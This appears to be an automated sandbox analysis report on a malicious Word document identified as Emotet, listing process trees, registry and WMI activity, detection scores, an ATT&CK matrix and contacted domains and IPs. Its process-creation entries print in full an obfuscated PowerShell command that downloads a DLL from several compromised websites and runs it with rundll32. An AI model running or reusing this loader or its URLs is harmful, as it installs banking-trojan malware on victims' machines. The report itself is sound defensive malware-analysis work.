Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191			Jump to behavior

Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615D6017
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_615D60E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615CE2F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	14_2_615D57AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615D597B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615D5B0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	14_2_615D5B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615D5A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615D5A24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615D5DE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615CDD93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_615D5F10

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B5916 cpuid

14_2_615B5916

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B5C3C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

14_2_615B5C3C

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000000A.00000002.533453735.000001A70123D000.00000004.00000001.sdmp	Binary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000A.00000002.533595093.000001A701302000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A1A40 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,

14_2_615A1A40

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting12	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information11	LSASS Memory	File and Directory Discovery2	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Logon Script (Windows)	Extra Window Memory Injection1	Scripting12	Security Account Manager	System Information Discovery145	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter11	Logon Script (Mac)	Process Injection112	Obfuscated Files or Information2	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell2	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Security Software Discovery261	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol114	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Extra Window Memory Injection1	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading21	DCSync	Virtualization/Sandbox Evasion31	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion31	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection112	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Rundll321	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1711.doc	40%	Virustotal		Browse
1711.doc	20%	Metadefender		Browse
1711.doc	58%	ReversingLabs	Document-Word.Trojan.Emotet

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\13791789.dll	34%	Metadefender		Browse
C:\ProgramData\13791789.dll	81%	ReversingLabs	Win32.Trojan.Emotet
C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)	34%	Metadefender		Browse
C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)	81%	ReversingLabs	Win32.Trojan.Emotet

Unpacked PE Files

Source	Detection	Scanner	Label	Download
16.2.rundll32.exe.670000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
15.2.rundll32.exe.d00000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
14.2.rundll32.exe.420000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
21.2.rundll32.exe.2f70000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

Source	Detection	Scanner	Label	Link
thepilatesstudionj.com	2%	Virustotal		Browse
alfaofarms.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://cdn.entity.	0%	URL Reputation	safe
https://45.79.33.48:8080/uDpHLeAeeItaVoryptography	0%	Avira URL Cloud	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHLz	0%	Avira URL Cloud	safe
https://staviancjs.com/wp-forum/QOm4n2/	100%	Avira URL Cloud	malware
http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split	100%	Avira URL Cloud	malware
https://51.178.61.60/xlgRAUoKyrAaNnNNtTN3	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://51.178.61.60/xlgRAUoKyrAaNnNNtTNa	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://45.79.33.48/	0%	Avira URL Cloud	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://51.178.61.60/xlgRAUoKyrAaNnNNtTNh	0%	Avira URL Cloud	safe
https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL4053062332-1002	0%	Avira URL Cloud	safe
http://thepilatesstudionj.co	0%	Avira URL Cloud	safe
https://45.79.33.48:8080/0	0%	Avira URL Cloud	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://45.79.33.48:8080/2	0%	Avira URL Cloud	safe
http://crl.micr	0%	URL Reputation	safe
https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/	0%	Avira URL Cloud	safe
https://168.197.250.14/563209-4053062332-1002	0%	Avira URL Cloud	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://168.197.250.14/W	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.pngp	0%	Avira URL Cloud	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe
https://wus2.pagecontentsync.	0%	URL Reputation	safe
https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL2q	0%	Avira URL Cloud	safe
https://51.178.61.60/E	0%	Avira URL Cloud	safe
http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/	100%	Avira URL Cloud	malware
https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL	0%	Avira URL Cloud	safe
https://cortana.ai/api	0%	URL Reputation	safe
https://168.197.250.14/h	0%	Avira URL Cloud	safe
http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/	0%	Avira URL Cloud	safe
https://45.79.33.48:8080/a	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
thepilatesstudionj.com	72.167.40.83	true	true	2%, Virustotal, Browse	unknown
alfaofarms.com	50.62.141.15	true	true	8%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://shell.suite.office.com:1443	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://autodiscover-s.outlook.com/	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://cdn.entity.	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://45.79.33.48:8080/uDpHLeAeeItaVoryptography	rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://api.aadrm.com/	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHLz	rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://api.microsoftstream.com/api/	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://cr.office.com	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://staviancjs.com/wp-forum/QOm4n2/	PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	true	Avira URL Cloud: malware	unknown
http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split	powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://51.178.61.60/xlgRAUoKyrAaNnNNtTN3	rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.339588827.0000000004711000.00000004.00000001.sdmp	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
https://officeci.azurewebsites.net/api/	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	false		high
https://51.178.61.60/xlgRAUoKyrAaNnNNtTNa	rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	false		high
http://crl.ver)	svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
